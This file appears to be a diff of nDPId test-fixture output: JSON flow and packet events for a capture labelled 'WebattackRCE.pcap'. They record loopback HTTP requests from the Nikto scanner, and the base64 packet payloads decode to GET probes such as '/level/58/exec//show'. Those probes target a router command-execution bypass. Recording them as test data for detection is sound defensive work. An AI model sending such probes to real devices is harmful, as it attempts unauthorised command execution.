-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 